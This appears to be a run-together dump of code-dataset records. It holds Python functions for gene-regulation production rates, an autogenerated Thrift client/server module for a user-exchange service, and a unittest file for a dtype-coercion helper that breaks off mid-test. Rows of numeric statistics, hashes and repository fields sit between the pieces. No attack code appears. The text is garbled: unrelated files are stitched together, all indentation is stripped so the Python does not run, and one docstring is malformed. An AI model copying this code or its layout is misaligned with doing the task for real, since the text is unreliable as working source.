def rr_and(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by two
repressors with AND logic in the absence of leakage.
Parameters
----------
x : float or NumPy array
Concentration of first repressor.
y : float or NumPy array
Concentration of second repressor.
nx : float
Hill coefficient for first repressor.
ny : float
Hill coefficient for second repressor.
Returns
-------
output : NumPy array or float
1 / (1 + x**nx) / (1 + y**ny)
"""
return 1.0 / (1.0 + x ** nx) / (1.0 + y ** ny)
def rr_and_single(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by two
repressors with AND logic in the absence of leakage with
single occupancy.
Parameters
----------
x : float or NumPy array
Concentration of first repressor.
y : float or NumPy array
Concentration of second repressor.
nx : float
Hill coefficient for first repressor.
ny : float
Hill coefficient for second repressor.
Returns
-------
output : NumPy array or float
1 / (1 + x**nx + y**ny)
"""
return 1.0 / (1.0 + x ** nx + y ** ny)
def rr_or(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by two
repressors with OR logic in the absence of leakage.
Parameters
----------
x : float or NumPy array
Concentration of first repressor.
y : float or NumPy array
Concentration of second repressor.
nx : float
Hill coefficient for first repressor.
ny : float
Hill coefficient for second repressor.
Returns
-------
output : NumPy array or float
(1 + x**nx + y**ny) / (1 + x**nx) / (1 + y**ny)
"""
return (1.0 + x ** nx + y ** ny) / (1.0 + x ** nx) / (1.0 + y ** ny)
def ar_and(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by one
activator and one repressor with AND logic in the absence of
leakage.
Parameters
----------
x : float or NumPy array
Concentration of activator.
y : float or NumPy array
Concentration of repressor.
nx : float
Hill coefficient for activator.
ny : float
Hill coefficient for repressor.
Returns
-------
output : NumPy array or float
x ** nx / (1 + x**nx) / (1 + y**ny)
"""
return x ** nx / (1.0 + x ** nx) / (1.0 + y ** ny)
def ar_or(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by one
activator and one repressor with OR logic in the absence of
leakage.
Parameters
----------
x : float or NumPy array
Concentration of activator.
y : float or NumPy array
Concentration of repressor.
nx : float
Hill coefficient for activator.
ny : float
Hill coefficient for repressor.
Returns
-------
output : NumPy array or float
(1 + x**nx + x**nx * y**ny)) / (1 + x**nx) / (1 + y**ny)
"""
return (1.0 + x ** nx * (1.0 + y ** ny)) / (1.0 + x ** nx) / (1.0 + y ** ny)
def ar_and_single(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by one
activator and one repressor with AND logic in the absence of
leakage with single occupancy.
Parameters
----------
x : float or NumPy array
Concentration of activator.
y : float or NumPy array
Concentration of repressor.
nx : float
Hill coefficient for activator.
ny : float
Hill coefficient for repressor.
Returns
-------
output : NumPy array or float
x ** nx / (1 + x**nx + y**ny)
"""
return x ** nx / (1.0 + x ** nx + y ** ny)
def ar_or_single(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by one
activator and one repressor with OR logic in the absence of
leakage with single occupancy.
Parameters
----------
x : float or NumPy array
Concentration of activator.
y : float or NumPy array
Concentration of repressor.
nx : float
Hill coefficient for activator.
ny : float
Hill coefficient for repressor.
Returns
-------
output : NumPy array or float
(1 + x**nx) / (1 + x**nx + y**ny)
"""
return (1.0 + x ** nx) / (1.0 + x ** nx + y ** ny)
| 25.67033
| 80
| 0.56835
| 954
| 7,008
| 4.157233
| 0.056604
| 0.027231
| 0.066566
| 0.094302
| 0.975794
| 0.971508
| 0.965709
| 0.960918
| 0.955119
| 0.908976
| 0
| 0.015843
| 0.315497
| 7,008
| 272
| 81
| 25.764706
| 0.810923
| 0.728881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.461538
| false
| 0
| 0
| 0
| 0.923077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
207fd602e53b75231f396c0ed8874c586d12e870
| 17,721
|
py
|
Python
|
thrift/gen-py/hello/UserExchange.py
|
amitsaha/playground
|
82cb5ac02ac90d3fa858a5153b0a5705187c14ce
|
[
"Unlicense"
] | 4
|
2018-04-14T16:28:39.000Z
|
2021-11-14T12:08:02.000Z
|
thrift/gen-py/hello/UserExchange.py
|
amitsaha/playground
|
82cb5ac02ac90d3fa858a5153b0a5705187c14ce
|
[
"Unlicense"
] | 3
|
2022-02-14T10:38:51.000Z
|
2022-02-27T16:01:16.000Z
|
thrift/gen-py/hello/UserExchange.py
|
amitsaha/playground
|
82cb5ac02ac90d3fa858a5153b0a5705187c14ce
|
[
"Unlicense"
] | 4
|
2015-07-07T01:01:27.000Z
|
2019-04-12T05:38:26.000Z
|
#
# Autogenerated by Thrift Compiler (0.9.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def ping(self):
pass
def add_user(self, u):
"""
Parameters:
- u
"""
pass
def get_user(self, uid):
"""
Parameters:
- uid
"""
pass
def clear_list(self):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def ping(self):
self.send_ping()
self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def add_user(self, u):
"""
Parameters:
- u
"""
self.send_add_user(u)
return self.recv_add_user()
def send_add_user(self, u):
self._oprot.writeMessageBegin('add_user', TMessageType.CALL, self._seqid)
args = add_user_args()
args.u = u
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_add_user(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = add_user_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "add_user failed: unknown result");
def get_user(self, uid):
"""
Parameters:
- uid
"""
self.send_get_user(uid)
return self.recv_get_user()
def send_get_user(self, uid):
self._oprot.writeMessageBegin('get_user', TMessageType.CALL, self._seqid)
args = get_user_args()
args.uid = uid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_user(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_user_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_user failed: unknown result");
def clear_list(self):
self.send_clear_list()
def send_clear_list(self):
self._oprot.writeMessageBegin('clear_list', TMessageType.CALL, self._seqid)
args = clear_list_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["ping"] = Processor.process_ping
self._processMap["add_user"] = Processor.process_add_user
self._processMap["get_user"] = Processor.process_get_user
self._processMap["clear_list"] = Processor.process_clear_list
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_add_user(self, seqid, iprot, oprot):
args = add_user_args()
args.read(iprot)
iprot.readMessageEnd()
result = add_user_result()
try:
result.success = self._handler.add_user(args.u)
except InvalidValueException, e:
result.e = e
oprot.writeMessageBegin("add_user", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_user(self, seqid, iprot, oprot):
args = get_user_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_user_result()
try:
result.success = self._handler.get_user(args.uid)
except InvalidValueException, e:
result.e = e
oprot.writeMessageBegin("get_user", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_clear_list(self, seqid, iprot, oprot):
args = clear_list_args()
args.read(iprot)
iprot.readMessageEnd()
self._handler.clear_list()
return
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class add_user_args:
"""
Attributes:
- u
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'u', (User, User.thrift_spec), None, ), # 1
)
def __init__(self, u=None,):
self.u = u
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.u = User()
self.u.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('add_user_args')
if self.u is not None:
oprot.writeFieldBegin('u', TType.STRUCT, 1)
self.u.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class add_user_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (InvalidValueException, InvalidValueException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = InvalidValueException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('add_user_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_user_args:
"""
Attributes:
- uid
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'uid', None, None, ), # 1
)
def __init__(self, uid=None,):
self.uid = uid
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.uid = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_user_args')
if self.uid is not None:
oprot.writeFieldBegin('uid', TType.I32, 1)
oprot.writeI32(self.uid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_user_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (User, User.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (InvalidValueException, InvalidValueException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = User()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = InvalidValueException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_user_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class clear_list_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('clear_list_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 29.05082
| 188
| 0.668585
| 2,141
| 17,721
| 5.25362
| 0.066791
| 0.017336
| 0.031206
| 0.060989
| 0.83197
| 0.798453
| 0.779783
| 0.749022
| 0.726262
| 0.71915
| 0
| 0.00359
| 0.21404
| 17,721
| 609
| 189
| 29.098522
| 0.803992
| 0.009762
| 0
| 0.767442
| 1
| 0
| 0.022222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.008457
| 0.012685
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
45da0fdf8d57270d1bbf22d1902ef827d862f813
| 121,867
|
py
|
Python
|
datatube/test/coerce_dtypes_test.py
|
eerkela/archivetube
|
a295987cf4a1234de58c1611fa0f45a626e76c2e
|
[
"MIT"
] | null | null | null |
datatube/test/coerce_dtypes_test.py
|
eerkela/archivetube
|
a295987cf4a1234de58c1611fa0f45a626e76c2e
|
[
"MIT"
] | null | null | null |
datatube/test/coerce_dtypes_test.py
|
eerkela/archivetube
|
a295987cf4a1234de58c1611fa0f45a626e76c2e
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta, timezone
import random
import unittest
import numpy as np
import pandas as pd
from pandas.testing import assert_frame_equal, assert_series_equal
import pytz
if __name__ == "__main__":
from pathlib import Path
import sys
sys.path.insert(0, str(Path(__file__).resolve().parents[2]))
from datatube.dtype import coerce_dtypes
unittest.TestCase.maxDiff = None
class CoerceDtypeBasicTests(unittest.TestCase):
def test_coerce_dtypes_returns_copy(self):
# series
in_series = pd.Series([1, 2, 3])
out_series = coerce_dtypes(in_series, float)
self.assertNotEqual(id(in_series), id(out_series))
# dataframe
in_df = pd.DataFrame({"copy": [1, 2, 3]})
out_df = coerce_dtypes(in_df, {"copy": float})
self.assertNotEqual(id(in_df), id(out_df))
class CoerceIntegerDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
size = 3 # minimum 3
cls.integers = [-1 * size // 2 + i + 1 for i in range(size)]
# integers = [..., -1, 0, 1, ...]
cls.bool_flags = [(i + 1) % 2 for i in range(size)]
# bool_flags = [1, 0, 1, 0, 1, ...]
cls.col_name = "integers"
def test_coerce_from_integer_to_integer_no_na(self):
in_data = self.integers
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_integer_with_na(self):
in_data = self.integers + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_float_no_na(self):
in_data = self.integers
out_data = [float(i) for i in self.integers]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_float_with_na(self):
in_data = self.integers + [None]
out_data = [float(i) for i in self.integers] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_complex_no_na(self):
in_data = self.integers
out_data = [complex(i, 0) for i in self.integers]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_complex_with_na(self):
in_data = self.integers + [None]
out_data = [complex(i, 0) for i in self.integers] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_string_no_na(self):
in_data = self.integers
out_data = [str(i) for i in self.integers]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_string_with_na(self):
in_data = self.integers + [None]
out_data = [str(i) for i in self.integers] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_generic_integer_to_boolean_no_na(self):
in_data = self.integers
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_generic_integer_to_boolean_with_na(self):
in_data = self.integers + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_integer_bool_flag_to_boolean_no_na(self):
in_data = self.bool_flags
out_data = [bool(i) for i in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_bool_flag_to_boolean_with_na(self):
in_data = self.bool_flags + [None]
out_data = [bool(i) for i in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_datetime_no_na(self):
in_data = self.integers
out_data = [datetime.fromtimestamp(i, tz=timezone.utc)
for i in self.integers]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_datetime_with_na(self):
in_data = self.integers + [None]
out_data = [datetime.fromtimestamp(i, tz=timezone.utc)
for i in self.integers] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_timedelta_no_na(self):
in_data = self.integers
out_data = [timedelta(seconds=i) for i in self.integers]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_timedelta_with_na(self):
in_data = self.integers + [None]
out_data = [timedelta(seconds=i) for i in self.integers] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_object_no_na(self):
in_series = pd.Series(self.integers)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_integer_to_object_with_na(self):
in_series = pd.Series(self.integers + [None])
